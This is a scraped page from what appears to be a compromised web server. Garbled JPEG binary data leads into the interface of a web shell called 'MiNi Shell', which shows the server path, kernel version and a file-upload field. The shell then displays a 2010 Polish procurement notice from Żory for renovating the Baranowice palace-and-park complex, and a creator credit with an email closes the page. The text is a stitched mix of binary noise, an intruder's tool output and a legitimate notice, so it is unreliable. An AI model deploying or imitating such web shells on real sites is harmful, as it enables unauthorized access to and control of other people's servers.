JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100816/252160-N-2010.html

<p class="kh_header"><b>Żory: Kompleksowe wykonanie prac związanych z renowacją Zespołu pałacowo-parkowego                        w Baranowicach</b><br>
<b>Numer ogłoszenia: 252160 - 2010; data zamieszczenia: 16.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 032 4348245, faks 032 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe wykonanie prac związanych z renowacją Zespołu pałacowo-parkowego                        w Baranowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowe wykonanie prac związanych z renowacją Zespołu pałacowo-parkowego   w Baranowicach Budynek pałacu jest obiektem zabytkowym (z XVII wieku), od kilkunastu lat nieużytkowanym - obecnie zdewastowanym.Dane ogólne budynku:-	pow.  zabudowy:	   578,00 m2-	pow.  użytkowa: 	1 175,21 m2- 	kubatura: 	7 452,00 m3- 	wysokość:	     12,91 mZakres robót:W ramach prac renowacyjnych należy wykonać między innymi:I. Część ogólnobudowlana 1)	Izolację pionową ścian zewnętrznych z zastosowaniem materiałów np. firmy REMMERS.2)	Izolację pionową ścian zewnętrznych i wewnętrznych metodą iniekcji niskociśnieniowej.3)	Remont drewnianej konstrukcji dachowej.4)	Wymianę pokrycia dachu (dachówki cementowe na dachówki ceramiczne karpiówki).5)	Wymianę stolarki okiennej oraz drzwiowej.6)	Wykonanie wejścia w elewacji północnej.7)	Renowację elewacji z naprawą i wymianą tynków , oraz rekonstrukcją  detali architektonicznych.8)	Malowanie elewacji farbą laserunkową, silikonowo-wapienną Historic Lasur.9)	Wyburzenia oraz demontaże  z wywozem  gruzu i materiałów z rozbiórki na wysyp.10)	Naprawy, uzupełnienia i zamurowania ścian.11)	Wymianę stropów oraz schodów.12)	Wykonanie  izolacji  przeciwwilgociowych  oraz cieplnych i przeciwdźwiękowych.13)	Tynki wewnętrzne z malowaniem ścian i sufitów.14)	Posadzki (płytki, posadzka granitowa, parkiet)15)	Dostawę, montaż i uruchomienie dźwigu osobowego z wykonaniem wentylacji  szybu. Dźwig zintegrowany z instalacją wykrywania pożaru(zjazd na przystanek ewakuacyjny, otwarcie drzwi i zatrzymanie urządzenia przy zaniku napięcia i po sygnale z instalacji p.poż.).   16)	Dostawę, montaż i uruchomienie dźwigu towarowego z wykonaniem wentylacji szybu.W zakresie robót dźwigowych należy wykonać dokumentację dźwigu osobowego i towarowego przeprowadzić rejestrację i odbiór z udziałem Urzędu Dozoru Technicznego i włączyć urządzenia do eksploatacji. II. Część elektryczna1)	Instalacji zasilania  z tablicą rozdzielczą.2)	Instalacji oświetlenia podstawowego i awaryjnego.3)	Instalacji gniazd wtykowych i siły.4)	Instalacji odgromowej.5)	Instalacji  iluminacji obiektu.6)	Instalacji elektrycznej kotłowni.7)	Instalacji systemu kontroli dostępu8)	Instalacji wideo domofonowej.9)	Instalacji antenowej RTV 10)	Instalacji teleinformatycznej11)	Instalacji monitoringu wizyjnego12)	Instalacji systemu sygnalizacji pożaru SAP13)	Instalacji zasilania i oświetlenia szybów dźwigowych.III. Część instalacyjna1)	Instalacja co2)	Instalacja gazowa3)	Kotłownia gazowa4)	Instalacja wentylacji mechanicznej i klimatyzacji 5)	Instalacja wod-kan i p.poż.6)	Przyłącze wody i kanalizacji sanitarnej IV. Zagospodarowanie parku1)	skwer reprezentacyjny od strony południowej2)	altana metalowa w części południowo-wschodniej 3)	wykonanie nawierzchni traktów parkowych typu HANSEGRAD 4)	ławki, kosze na śmieci, tablica informacyjna, ogrodzenie 5)	oświetlenie parku i instalacja elektryczna altany6)	rewaloryzacja części parku - zieleń projektowana i wycinki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość wykonania zamówień uzupełniających (zgodnie z przedmiotem zamówienia podstawowego) w okresie 3 lat od udzielenia zamówienia. Szacunkowa wartość zamówienia uzupełniającego -778.688,52 zł.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.25.20-2, 45.41.00.00-4, 45.42.11.31-1, 45.42.11.46-9, 45.43.10.00-7, 45.44.21.00-8, 45.31.00.00-3, 45.31.11.00-1, 45.31.12.00-2, 45.33.00.00-9, 45.33.12.10-1, 45.21.23.53-5, 45.11.24.50-4, 45.11.27.11-2, 45.26.10.00-4, 45.26.23.11-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 240.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Weryfikacja spełnienia warunku odbędzie się w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek  za spełniony, jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia w  okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane na obiekcie zabytkowym odpowiadające zakresowi robót budowlanych opisanemu w pkcie 3 SIWZ, o wartości nie mniejszej niż 3.000.000 zł (brutto) każda oraz załączy dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej, wytycznymi nadzoru konserwatorskiego i prawidłowo ukończone.Ocena spełnienia ww. warunku nastąpi w oparciu o dołączone do oferty dokumenty, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Weryfikacja spełnienia warunku odbędzie się w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za kierowanie robotami budowlanymi w branżach: ogólnobudowlanej, instalacji elektrycznych, instalacji sanitarnych i drogowych (uprawnienia do kierowania, nadzorowania i kontrolowania budowy i robót) oraz do kierowania pracami przy zabytkach spełniające wymogi rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 roku (Dz.U. nr 150 poz. 1579) w sprawie prowadzenia prac konserwatorskich; wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.Ocena spełnienia ww. warunku nastąpi w oparciu o dołączone do oferty oświadczenia i dokumenty, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z sumą gwarancyjną nie mniejszą niż 2.000.000,00 zł, w przypadku braku opłaconej polisy inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.W przypadku gdy z treści polisy nie wynika, że została opłacona, należy dołączyć do oferty dowód jej opłacenia.Ocena spełnienia ww. warunku nastąpi w oparciu o dołączone do oferty oświadczenia i dokumenty, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie - zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt - jeżeli Wykonawca polega na zasobach innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w niżej opisanych przypadkach:I. Przyczyna/okoliczności                                         Warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy.Skutek - zmiana w umowie/aneksPrzedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót.II. Przyczyna/okoliczności                                         Wystąpienie zdarzeń losowych - powódź, pożar, trąba powietrzna itp.Skutek - zmiana w umowie/aneksZmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót.III. Przyczyna/okoliczności                                         Wystąpienie robót koniecznych zgodnie z art. 67 ust.1 pkt.5                                           Skutek - zmiana w umowie/aneksZmiana terminu wykonania robót o tyle dni, ile trwało wykonanie robót koniecznych.IV. Przyczyna/okoliczności                                         Konieczność zmiany dokumentacji projektowej wynikła w trakcie realizacji inwestycji.Skutek - zmiana w umowie/aneksZmiana terminu realizacji zamówienia o  tyle dni, ile trwało przeprojektowanie, dostawa materiałów i realizacja, wynikłe ze zmian projektowych.V. Przyczyna/okoliczności                                         Zmiana przepisów o podatku od towarów i usług                                                                    Skutek - zmiana w umowie/aneksZmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT.                                                                 VI. Przyczyna/okoliczności                                                                        Rezygnacja z części robót na skutek sytuacji niemożliwej wcześniej do przewidzenia.Skutek - zmiana w umowie/aneksZmniejszenie wynagrodzenia wykonawcy o kwotę, którą należałoby zapłacić gdyby przedmiotowe roboty zostały wykonaneVII. Przyczyna/okoliczności                                                                        Przekształcenie firmy, zmiana nazwy firmy      Skutek - zmiana w umowie/aneksSpisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmyVIII. Przyczyna/okolicznościZnalezienie niewybuchów lub znalezisk archeologicznych.Skutek - zmiana w umowie/aneksPrzesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów lub prac archeologicznychIX. Przyczyna/okolicznościZnalezienie stanowisk zwierząt i roślin chronionychSkutek - zmiana w umowie/aneksPrzesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z zabezpieczeniem naturalnych stanowisk zwierząt i roślin objętych ochroną gatunkowąX. Przyczyna/okolicznościKonieczność przedłużenia okresu związania ofertą i opóźnienie w zawarciu umowy z przyczyn niezależnych od Wykonawcy.Skutek - zmiana w umowie/aneksPrzesunięcie terminu realizacji robót o tyle dni o ile przesunął się termin zawarcia umowy.XI. Przyczyna/okolicznościOdkrycie nowych elementów zabytkowych: polichromii, malowideł itp.Skutek - zmiana w umowie/aneksPrzesunięcie terminu wykonania tej części zadania, która jest związana z polichromią, malowidłami itp. o taki czas, ile trwało wstrzymanie robót.XII. Przyczyna/okolicznościZgoda Konserwatora zabytków na wykonanie dodatkowego przystanku windy na poddaszu i uzyskanie zmiany pozwolenia na budowę w zakresie wykonania niniejszych prac (decyzja co do ilości przystanków i  rodzaju windy zostanie podjęta przez Zamawiającego w terminie 3 miesięcy od podpisania umowy).Skutek - zmiana w umowie/aneksZmiana projektu budowlanego i wynikająca z tego zmiana zakresu umowy, przesunięcie terminu realizacji zamówienia o 7 dni kalendarzowych oraz zmiana wynagrodzenia (za dostawę i montaż windy - o kwotę stanowiącą różnicę pomiędzy ceną przetargową a ofertą zamienną wynikającą z dostarczonych Zamawiającemu dowodów zakupu urządzenia, jednak nie więcej niż 25% ceny przetargowej; za roboty budowlane  - jeśli odpowiadają pozycjom w kosztorysie przetargowym, po cenach jednostkowych wynikających z tego kosztorysu, jeżeli nie odpowiadają pozycjom w kosztorysie przetargowym, Wykonawca przedłoży do akceptacji kalkulację cenową, opracowaną z uwzględnieniem średnich cen publikowanych w wydawnictwie Sekocenbud i nakładów określonych w katalogach nakładów rzeczowych) .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, Zespół Zamówień Publicznych, pok. 207 II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 12:00, miejsce: Urząd Miasta Żory, Al. Wojska Polskiego 25, 44-240 Żory - Informacja (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zespół pałacowo-parkowy w Baranowicach  jest układem zabytkowym objętym ochroną prawną przez wpisanie do rejestru zabytków decyzją Wojewódzkiego Konserwatora Zabytków w Katowicach.2.	Śląski Wojewódzki Konserwator Zabytków w Katowicach  wydał pozwolenie nr 2301/09 na prowadzenie robót budowlanych przy zabytku wpisanym do rejestru. Wykonawca zobowiązany jest wykonywać prace budowlane zgodnie z przedmiotowym pozwoleniem.3.	Wykonawca ma obowiązek uzyskać ostateczną decyzję o pozwoleniu na użytkowanie obiektu.4.	Miasto zamierza przystąpić do konkursu z działania 6.2.1 Rewitalizacja - duże miasta w ramach RPO WSL na lata 2007 - 2013 i zgłosić projekt Renowacja zespołu pałacowo parkowego w Żorach - Baranowicach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com